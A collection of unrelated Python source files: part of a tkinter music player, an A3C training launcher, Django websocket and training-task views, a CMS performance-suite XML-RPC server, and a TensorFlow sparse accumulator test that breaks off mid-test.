selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Rhythm could not find the file. Please check again.')
def stop_music():
mixer.music.stop()
statusbar["text"] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
# set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
muted = FALSE
def mute_music():
global muted
if muted: # Unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
else: # mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30,padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0,column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0,column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0,column=2, padx=10)
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0,column=0,padx=15)
mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70)
mixer.music.set_volume(0.7)
scale.grid(row=0,column=2,pady=15,padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
main.py
|
from __future__ import print_function
import argparse
import os
import json
import torch
import torch.multiprocessing as mp
import numpy as np
import optim
from envs import create_atari_env
from model import ActorCritic
from evaluation import evaluation
from train import train
def parse_arg():
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--entropy', type=float, default=0.001)
parser.add_argument('--value-loss', type=float, default=0.5)
parser.add_argument('--seed', type=int, default=2)
parser.add_argument('--num-processes', type=int, default=4)
parser.add_argument('--num-steps', type=int, default=20)
parser.add_argument('--max-episode-length', type=int, default=1000000)
parser.add_argument('--num-episodes', type=int, default=200)
parser.add_argument('--env-name', default='PongDeterministic-v4')
parser.add_argument('--no-shared', default=False)
parser.add_argument('--use-sn-critic', default=False, type=bool)
parser.add_argument('--use-sn-actor', default=False, type=bool)
parser.add_argument('--use-sn-shared', default=False, type=bool)
parser.add_argument('--depth-actor', default=0, type=int)
parser.add_argument('--depth-critic', default=0, type=int)
parser.add_argument('--use-visdom', default=False, type=bool)
parser.add_argument('--server', help='Visdom server')
parser.add_argument('--port', help='Visdom port')
parser.add_argument('--exp-name', default='main')
parser.add_argument('--root-path', default='.')
return parser.parse_args()
def prepare_save_path(args):
if not os.path.isdir(args.save_path):
print('%s did not exist. Creating it' % args.save_path)
os.makedirs(args.save_path)
os.makedirs(args.model_path, exist_ok=True)
class MockVisdom():
def text(self, *args, **kwargs):
pass
def line(self, *args, **kwargs):
pass
def histogram(self, *args, **kwargs):
pass
if __name__ == '__main__':
args = parse_arg()
args.save_path = os.path.join(args.root_path, args.exp_name)
args.model_path = os.path.join(args.save_path, 'model')
if args.use_visdom:
import visdom
vis = visdom.Visdom(server=args.server, port=args.port, env=args.exp_name)
else:
vis = MockVisdom()
vis.text(repr(args), win='args')
prepare_save_path(args)
json.dump(vars(args), open(os.path.join(args.save_path, 'args.json'), 'w'))
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space, args.use_sn_critic, args.use_sn_actor,
args.use_sn_shared, args.depth_actor, args.depth_critic)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
# mp.set_start_method('spawn')
counter = mp.Value('i', 0)
n_episodes = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=evaluation, args=(args.num_processes, args, shared_model, counter, n_episodes, vis, optimizer))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, n_episodes, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
views.py
|
from django.shortcuts import render
# Create your views here.
from dwebsocket.decorators import accept_websocket, require_websocket
from django.http import HttpResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from DjangoRestAuth.publicApi import DocParam, get_parameter_dic,tid_maker, RedisHelper
from train_net.tasks import start_running
import time,json
from django.conf import settings
from django.core.cache import cache
@accept_websocket
def echo_once(request,executionId):
if not request.is_websocket(): # 判断是不是websocket连接
try: # 如果是普通的http方法
message = request.GET['message']
return HttpResponse(message)
except:
return render(request, 'index.html')
else:
while True:
# for message in request.websocket:
# message = message.decode('utf-8') # 接收前端发来的数据
# print(message)
# print('收到websocket请求')
print('executionId=======',executionId)
obj = RedisHelper(executionId)
redis_sub = obj.subscribe()
msg = redis_sub.parse_response()
if type(msg[2]) == bytes:
msg = msg[2].decode()
print(msg+'--==')
msg = json.loads(msg.replace("'", '"'))
msg = json.dumps(msg, ensure_ascii=False).encode('utf-8')
message = msg
print(message)
request.websocket.send(message)
import threading
class run_neural_net(APIView):
'''
训练神经网络
'''
coreapi_fields = (
DocParam("epoch_range", description='轮询次数', required=True),#10
DocParam("lr", description='浮点'),#0.01
)
def post(self, request, *args, **kwargs):
epoch_range = get_parameter_dic(request)['epoch_range']
lr = get_parameter_dic(request)['lr']
task_id = tid_maker()
run = threading.Thread(target=start_running, args=(task_id,lr,epoch_range))
run.start()
# start_running.delay(lr,epoch_range)
return Response({"executionId": task_id})
|
cmsPerfServer.py
|
#!/usr/bin/env python
import cmsPerfPublish as cspp
import cmsPerfSuite as cps
import cmsPerfHarvest as cph
#G.Benelli
import cmsRelValCmd #Module that contains get_cmsDriverOptions() function to get a string with the options we are interested in from cmsDriver_highstats_hlt.txt
import cmsCpuInfo #Module that contains get_NumOfCores() function to get an integer with the number of cores on the current machine (through parsing /proc/cpuinfo)
from cmsPerfCommons import Candles
import optparse as opt
import socket, os, sys, SimpleXMLRPCServer, threading, exceptions
CandlesString=""
for candle in Candles:
CandlesString=CandlesString+","+candle
print CandlesString[1:]
_outputdir = os.getcwd()
_reqnumber = 0
_logreturn = False
_PROG_NAME = os.path.basename(sys.argv[0])
_CASTOR_DIR = "/castor/cern.ch/cms/store/relval/performance/"
_DEFAULTS = {"castordir" : _CASTOR_DIR,
"perfsuitedir" : os.getcwd(),
"TimeSizeEvents" : 100 ,
"TimeSizeCandles" : "",
"TimeSizePUCandles" : "",
"IgProfEvents" : 0 ,
"IgProfCandles" : "" ,
"IgProfPUCandles" : "" ,
"CallgrindEvents" : 0 ,
"CallgrindCandles" : "" ,
"CallgrindPUCandles" : "" ,
"MemcheckEvents" : 0 ,
"MemcheckCandles" : "" ,
"MemcheckPUCandles" : "" ,
"cmsScimark" : 10 ,
"cmsScimarkLarge" : 10 ,
"cmsdriverOptions" : cmsRelValCmd.get_cmsDriverOptions(), #Get these options automatically now!
"stepOptions" : "" ,
"quicktest" : False ,
"profilers" : "" ,
"cpus" : "1" ,
"cores" : cmsCpuInfo.get_NumOfCores(), #Get this option automatically
"prevrel" : "" ,
"isAllCandles" : True ,
#"candles" : CandlesString[1:] ,
"bypasshlt" : False ,
"runonspare" : True ,
"logfile" : os.path.join(os.getcwd(),"cmsPerfSuite.log")}
def optionparse():
global _outputdir
parser = opt.OptionParser(usage=("""%s [Options]""" % _PROG_NAME))
parser.add_option('-p',
'--port',
type="int",
dest='port',
default=8000, #Setting the default port to be 8000
help='Run server on a particular port',
metavar='<PORT>',
)
parser.add_option('-o',
'--output',
type="string",
dest='outputdir',
default="",
help='The output directory for all the cmsPerfSuite runs',
metavar='<DIR>',
)
(options, args) = parser.parse_args()
if not options.outputdir == "":
options.outputdir = os.path.abspath(options.outputdir)
if not os.path.exists(options.outputdir):
parser.error("the specified output directory %s does not exist" % options.outputdir)
sys.exit()
#This seems misleading naming _DEFAULTS, while we are re-initializing its keys to different values as we go...
_DEFAULTS["perfsuitedir"] = options.outputdir
#resetting global variable _outputdir too... do we really need this variable?
_outputdir = options.outputdir
return (options.port,options.outputdir)
#class ClientThread(threading.Thread):
# Overloading the constructor to accept cmsPerfSuite parameters
def runserv(port):
# Remember that localhost is the loopback network: it does not provide
# or require any connection to the outside world. As such it is useful
# for testing purposes. If you want your server to be seen on other
# machines, you must use your real network address in stead of
# 'localhost'.
server = None
try:
server = SimpleXMLRPCServer.SimpleXMLRPCServer((socket.gethostname(),port))
server.register_function(request_benchmark)
except socket.error as detail:
print "ERROR: Could not initialise server:", detail
sys.stdout.flush()
sys.exit()
print "Running server on port %s... " % port
sys.stdout.flush()
while True:
try:
server.handle_request()
sys.stdout.flush()
except (KeyboardInterrupt, SystemExit):
#cleanup
server.server_close()
raise
except:
#cleanup
server.server_close()
raise
server.server_close()
#Not sure about this unused function:
#Probably left over from first server implementation tests
#def runcmd(cmd):
# process = os.popen(cmd)
# cmdout = process.read()
# exitstat = process.close()
#
# if True:
# print cmd
# print cmdout
#
# if not exitstat == None:
# sig = exitstat >> 16 # Get the top 16 bits
# xstatus = exitstat & 0xffff # Mask out all bits except the bottom 16
# raise
# return cmdout
def readlog(logfile):
astr = ""
try:
for line in open(logfile,"r"):
astr += line
except (OSError, IOError) as detail:
print detail
return astr
def getCPSkeyword(key,dict):
if key in dict:
return dict[key]
else:
return _DEFAULTS[key]
def request_benchmark(cmds):
#This is the function with which the server listens on the given port
#cmds is a list of dictionaries: each dictionary is a set of cmsPerfSuite commands to run.
#Most common use will be only 1 dictionary, but for testing with reproducibility and statistical errors
#one can easily think of sending the same command 10 times for example and then compare the outputs
global _outputdir, _reqnumber
print "Commands received running perfsuite for these jobs:"
print cmds
sys.stdout.flush()
try:
# input is a list of dictionaries each defining the
# keywords to cmsperfsuite
outs = []
cmd_num = 0
exists = True
#Funky way to make sure we create a directory request_n with n = serial request number (if the server is running for a while
#and the client submits more than one request
#This should never happen since _reqnumber is a global variable on the server side...
while exists:
topdir = os.path.join(_outputdir,"request_" + str(_reqnumber))
exists = os.path.exists(topdir)
_reqnumber += 1
os.mkdir(topdir)
#Going through each command dictionary in the cmds list (usually only 1 such dictionary):
for cmd in cmds:
curperfdir = os.path.abspath(os.path.join(topdir,str(cmd_num)))
if not os.path.exists(curperfdir):
os.mkdir(curperfdir)
logfile = os.path.join(curperfdir, "cmsPerfSuite.log")
if os.path.exists(logfile):
logfile = logfile + str(cmd_num)
print cmd
if 'cpus' in cmd:
if cmd['cpus'] == "All":
print "Running performance suite on all CPUS!\n"
cmd['cpus']=""
for cpu in range(cmsCpuInfo.get_NumOfCores()):
cmd["cpus"]=cmd["cpus"]+str(cpu)+","
cmd["cpus"]=cmd["cpus"][:-1] #eliminate the last comma for cleanliness
print "I.e. on cpus %s\n"%cmd["cpus"]
#Not sure this is the most elegant solution... we keep cloning dictionaries...
cmdwdefs = {}
cmdwdefs["castordir" ] = getCPSkeyword("castordir" , cmd)
cmdwdefs["perfsuitedir" ] = curperfdir
cmdwdefs["TimeSizeEvents" ] = getCPSkeyword("TimeSizeEvents" , cmd)
cmdwdefs["TimeSizeCandles" ] = getCPSkeyword("TimeSizeCandles" , cmd)
cmdwdefs["TimeSizePUCandles" ] = getCPSkeyword("TimeSizePUCandles" , cmd)
cmdwdefs["IgProfEvents" ] = getCPSkeyword("IgProfEvents" , cmd)
cmdwdefs["IgProfCandles" ] = getCPSkeyword("IgProfCandles" , cmd)
cmdwdefs["IgProfPUCandles" ] = getCPSkeyword("IgProfPUCandles" , cmd)
cmdwdefs["CallgrindEvents" ] = getCPSkeyword("CallgrindEvents" , cmd)
cmdwdefs["CallgrindCandles"] = getCPSkeyword("CallgrindCandles" , cmd)
cmdwdefs["CallgrindPUCandles"] = getCPSkeyword("CallgrindPUCandles" , cmd)
cmdwdefs["MemcheckEvents" ] = getCPSkeyword("MemcheckEvents" , cmd)
cmdwdefs["MemcheckCandles" ] = getCPSkeyword("MemcheckCandles" , cmd)
cmdwdefs["MemcheckPUCandles" ] = getCPSkeyword("MemcheckPUCandles" , cmd)
cmdwdefs["cmsScimark" ] = getCPSkeyword("cmsScimark" , cmd)
cmdwdefs["cmsScimarkLarge" ] = getCPSkeyword("cmsScimarkLarge" , cmd)
cmdwdefs["cmsdriverOptions"] = getCPSkeyword("cmsdriverOptions", cmd)
cmdwdefs["stepOptions" ] = getCPSkeyword("stepOptions" , cmd)
cmdwdefs["quicktest" ] = getCPSkeyword("quicktest" , cmd)
cmdwdefs["profilers" ] = getCPSkeyword("profilers" , cmd)
cmdwdefs["cpus" ] = getCPSkeyword("cpus" , cmd)
cmdwdefs["cores" ] = getCPSkeyword("cores" , cmd)
cmdwdefs["prevrel" ] = getCPSkeyword("prevrel" , cmd)
# cmdwdefs["candles" ] = getCPSkeyword("candles" , cmd)
# cmdwdefs["isAllCandles" ] = len(Candles) == len(cmdwdefs["candles"]) #Dangerous: in the _DEFAULTS version this is a boolean!
cmdwdefs["bypasshlt" ] = getCPSkeyword("bypasshlt" , cmd)
cmdwdefs["runonspare" ] = getCPSkeyword("runonspare" , cmd)
cmdwdefs["logfile" ] = logfile
logh = open(logfile,"w")
logh.write("This perfsuite run was configured with the following options:\n")
#logh.write(str(cmdwdefs) + "\n")
for key in cmdwdefs.keys():
logh.write(key + "\t" +str(cmdwdefs[key])+"\n")
logh.close()
print "Calling cmsPerfSuite.main() function\n"
cpsInputArgs=[
#"-a",cmdwdefs["castordir"],
"-t",cmdwdefs["TimeSizeEvents" ],
"--RunTimeSize",cmdwdefs["TimeSizeCandles"],
"-o",cmdwdefs["perfsuitedir" ],
#"-i",cmdwdefs["IgProfEvents" ],
#"--RunIgProf",cmdwdefs["RunIgProf" ],
#"-c",cmdwdefs["CallgrindEvents" ],
#"--RunCallgrind",cmdwdefs["RunCallgrind" ],
#"-m",cmdwdefs["MemcheckEvents"],
#"--RunMemcheck",cmdwdefs["RunMemcheck"],
"--cmsScimark",cmdwdefs["cmsScimark" ],
"--cmsScimarkLarge",cmdwdefs["cmsScimarkLarge" ],
"--cmsdriver",cmdwdefs["cmsdriverOptions"],
"--step",cmdwdefs["stepOptions" ],
#"--quicktest",cmdwdefs["quicktest" ],
#"--profile",cmdwdefs["profilers" ],
"--cpu",cmdwdefs["cpus" ],
"--cores",cmdwdefs["cores" ],
#"--prevrel",cmdwdefs["prevrel" ],
# "--candle",cmdwdefs["candles" ],
#"--bypass-hlt",cmdwdefs["bypasshlt" ],
"--notrunspare"#,cmdwdefs["runonspare" ]#,
#"--logfile",cmdwdefs["logfile" ]
]
print cpsInputArgs
cps.main(cpsInputArgs)
print "Running of the Performance Suite is done!"
#logreturn is false... so this does not get executed
#Maybe we can replace this so that we can have more verbose logging of the server activity
if _logreturn:
outs.append(readlog(logfile))
else:
outs.append((cmdwdefs,cph.harvest(curperfdir)))
#incrementing the variable for the command number:
cmd_num += 1
return outs #Not sure what James intended to return here... the contents of all logfiles in a list of logfiles?
except exceptions.Exception as detail:
# wrap the entire function in try except so we can log the error at client and server
logh = open(os.path.join(os.getcwd(),"error.log"),"a")
logh.write(str(detail) + "\n")
logh.flush()
logh.close()
print detail
sys.stdout.flush()
raise
def _main():
print _DEFAULTS
(port, outputdir) = optionparse()
server_thread = threading.Thread(target = runserv(port))
server_thread.setDaemon(True) # Allow process to finish if this is the only remaining thread
server_thread.start()
if __name__ == "__main__":
_main()
|
sparse_conditional_accumulator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
def _indexedslice(x, noshape=False):
x = np.array(x)
dense_shape = x.shape
ndim = len(dense_shape)
indices = np.where(np.sum(x, tuple(range(1, ndim))))[0]
values = x[indices]
if noshape:
dense_shape = None
return ops.IndexedSlices(
indices=indices.tolist(), values=values, dense_shape=dense_shape)
class IndexedSlicesConditionalAccumulatorTest(test.TestCase):
def _assertEqual_indexedslices(self, expected_tensor, result):
self.assertAllEqual(expected_tensor.indices, result.indices)
self.assertAllEqual(expected_tensor.values, result.values)
if (result.dense_shape is not None and
expected_tensor.dense_shape is not None):
self.assertAllEqual(expected_tensor.dense_shape, result.dense_shape)
def _assertEqual_nparray(self, expected_array, result, sess):
expected_tensor = _indexedslice(expected_array)
self._assertEqual_indexedslices(expected_tensor, result)
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q")
self.assertTrue(isinstance(q.accumulator_ref, ops.Tensor))
self.assertProtoEquals(
"""
name:'Q' op:'SparseConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { unknown_rank: true} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
attr { key: 'reduction_type' value {s: 'MEAN'} }
""", q.accumulator_ref.op.node_def)
def testConstructorWithInvalidArg(self):
with ops.Graph().as_default():
with self.assertRaises(ValueError):
data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", reduction_type="Invalid")
def testConstructorWithShape(self):
with ops.Graph().as_default():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1, 5, 2, 8]))
self.assertTrue(isinstance(q.accumulator_ref, ops.Tensor))
self.assertProtoEquals(
"""
name:'Q' op:'SparseConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { dim {size: 1 }
dim {size: 5 }
dim {size: 2 }
dim {size: 8 }
} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
attr { key: 'reduction_type' value {s: 'MEAN'} }
""", q.accumulator_ref.op.node_def)
@test_util.run_deprecated_v1
def testAccumulatorSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q")
self.assertEqual(q.num_accumulated().eval(), 0)
@test_util.run_deprecated_v1
def testAccumulatorSetGlobalStep(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
set_global_step_op = q.set_global_step(1)
set_global_step_op.run()
@test_util.run_deprecated_v1
def testAccumulatorApplyGradFloat32(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
accum_op = q.apply_indexed_slices_grad(
ops.IndexedSlices(
indices=[0, 2],
values=np.array([[0, 0, 1], [3, 0, 4]]).astype(np.float32)))
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
@test_util.run_deprecated_v1
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [dtypes_lib.float16, dtypes_lib.float32, dtypes_lib.float64]
for i in range(len(dtypes)):
dtype = dtypes[i]
q = data_flow_ops.SparseConditionalAccumulator(
dtype, shape=tensor_shape.TensorShape([3, 3, 3]))
elems = np.arange(2)
sum_elems = np.zeros([3, 3, 3]).astype(dtype.as_numpy_dtype)
for e in elems:
mat_to_add = np.zeros([3, 3, 3]).astype(dtype.as_numpy_dtype)
mat_to_add[i, i, i] = e + 1
sum_elems += mat_to_add
t = _indexedslice(mat_to_add)
q.apply_indexed_slices_grad(t).run()
result = self.evaluate(q.take_indexed_slices_grad(1))
self._assertEqual_nparray(sum_elems / len(elems), result, sess)
@test_util.run_deprecated_v1
def testAccumulatorMultipleAccumulators(self):
with self.cached_session() as sess:
q_f32_0 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
q_f32_1 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
q_f16_0 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([2, 2]))
q_f16_1 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([2, 2]))
accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
elems = [[[1, 0], [0, 0]], [[0, 1], [0, 0]], [[0, 0], [1, 0]], [[0, 0],
[0, 1]]]
expected_tensors = []
for i in range(len(accums)):
tensor_to_add = np.array(elems[i]).astype(accums[i]
.dtype.as_numpy_dtype)
expected_tensor = _indexedslice(tensor_to_add)
expected_tensors.append(expected_tensor)
st = _indexedslice(tensor_to_add)
accums[i].apply_indexed_slices_grad(st).run()
for i in range(len(accums)):
result = sess.run(accums[i].take_indexed_slices_grad(1))
self._assertEqual_indexedslices(expected_tensors[i], result)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradMean(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=())
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1], values=np.array([[1, 0], [0, 2]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices)
accum_op.run()
accum_op = q.apply_grad([0, 2],
np.array([[0, 1], [3, 0]]).astype(np.float32),
[3, 2])
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual([0, 1, 2], val.indices)
self.assertAllEqual([[0.5, 0.5], [0, 2], [3, 0]], val.values)
self.assertAllEqual([-1, 2], val.dense_shape)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradSum(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=(), reduction_type="SUM")
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1], values=np.array([[1, 0], [0, 2]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices)
accum_op.run()
accum_op = q.apply_grad([0, 2],
np.array([[0, 1], [3, 0]]).astype(np.float32),
[3, 2])
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual([0, 1, 2], val.indices)
self.assertAllEqual([[1, 1], [0, 2], [3, 0]], val.values)
self.assertAllEqual([-1, 2], val.dense_shape)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradInvalidReductionType(self):
with self.assertRaises(ValueError):
data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=(), reduction_type="Invalid")
@test_util.run_deprecated_v1
def testAccumulatorRepeatedTakeGrad(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=())
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1], values=np.array([[1, 0], [0, 2]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices, local_step=0)
accum_op.run()
accum_op = q.apply_grad(
[0, 2],
np.array([[0, 1], [3, 0]]).astype(np.float32), [3, 2],
local_step=0)
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual(val.indices, [0, 1, 2])
self.assertAllEqual(val.values, [[0.5, 0.5], [0, 2], [3, 0]])
self.assertAllEqual(val.dense_shape, [-1, 2])
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1],
values=np.array([[10, 0], [0, 20]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices, local_step=1)
accum_op.run()
accum_op = q.apply_grad(
[0, 2],
np.array([[0, 10], [30, 0]]).astype(np.float32), [3, 2],
local_step=1)
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual(val.indices, [0, 1, 2])
self.assertAllEqual(val.values, [[5, 5], [0, 20], [30, 0]])
self.assertAllEqual(val.dense_shape, [-1, 2])
@test_util.run_v1_only("b/120545219")
def testParallelApplyGradMean(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = []
for x in elems:
x = _indexedslice(np.array([[x, 0], [0, x]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(x, local_step=0))
takeg_t = q.take_indexed_slices_grad(1)
def apply_indexed_slices_grad(accum_op):
self.evaluate(accum_op)
threads = [
self.checkedThread(
target=apply_indexed_slices_grad, args=(o,)) for o in accum_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = self.evaluate(takeg_t)
expected_val = sum(elems) / len(elems)
self._assertEqual_nparray(
np.array([[expected_val, 0], [0, expected_val]]).astype(np.float32),
val, sess)
@test_util.run_v1_only("b/120545219")
def testParallelApplyGradSum(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([2, 2]),
reduction_type="SUM")
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = []
for x in elems:
x = _indexedslice(np.array([[x, 0], [0, x]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(x, local_step=0))
takeg_t = q.take_indexed_slices_grad(1)
def apply_indexed_slices_grad(accum_op):
self.evaluate(accum_op)
threads = [
self.checkedThread(target=apply_indexed_slices_grad, args=(o,))
for o in accum_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = self.evaluate(takeg_t)
expected_val = 550.0
self._assertEqual_nparray(
np.array([[expected_val, 0], [0, expected_val]]).astype(np.float32),
val, sess)
@test_util.run_v1_only("b/120545219")
def testParallelTakeGrad(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
elems = [e + 1 for e in range(10)]
accum_ops = []
for e in elems:
v = _indexedslice(np.array([[0, 0], [e, 0]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(v, local_step=e - 1))
takeg_t = q.take_indexed_slices_grad(1)
results = []
def apply_indexed_slices_grad():
for accum_op in accum_ops:
time.sleep(1.0)
self.evaluate(accum_op)
apply_indexed_slices_grad_thread = self.checkedThread(
target=apply_indexed_slices_grad)
def take_grad():
t = self.evaluate(takeg_t)
results.append(t)
threads = [self.checkedThread(target=take_grad) for _ in range(10)]
for thread in threads:
thread.start()
apply_indexed_slices_grad_thread.start()
for thread in threads:
thread.join()
apply_indexed_slices_grad_thread.join()
for i in range(len(accum_ops)):
self._assertEqual_nparray(
np.array([[0, 0], [elems[i], 0]]), results[i], sess)
@test_util.run_v1_only("b/120545219")
def testAccumulatorApplyAndBlockingTake(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
elems = [10.0, 20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = []
for x in elems:
x = _indexedslice(np.array([[0, x], [0, 0]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(x, local_step=0))
takeg_t = q.take_indexed_slices_grad(3)
results = []
def apply_indexed_slices_grad():
for accum_op in accum_ops:
self.evaluate(accum_op)
def take_grad():
results.append(self.evaluate(takeg_t))
accum_thread = self.checkedThread(target=apply_indexed_slices_grad)
takeg_thread = self.checkedThread(target=take_grad)
accum_thread.start()
takeg_thread.start()
accum_thread.join()
takeg_thread.join()
self._assertEqual_nparray([[0, elems_ave], [0, 0]], results[0], sess)
def _blocking_takeg(self, sess, takeg_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(takeg_op)
@test_util.run_v1_only("b/120545219")
def testAccumulatorCancel(self):
# We need each thread to keep its own device stack or the device scopes
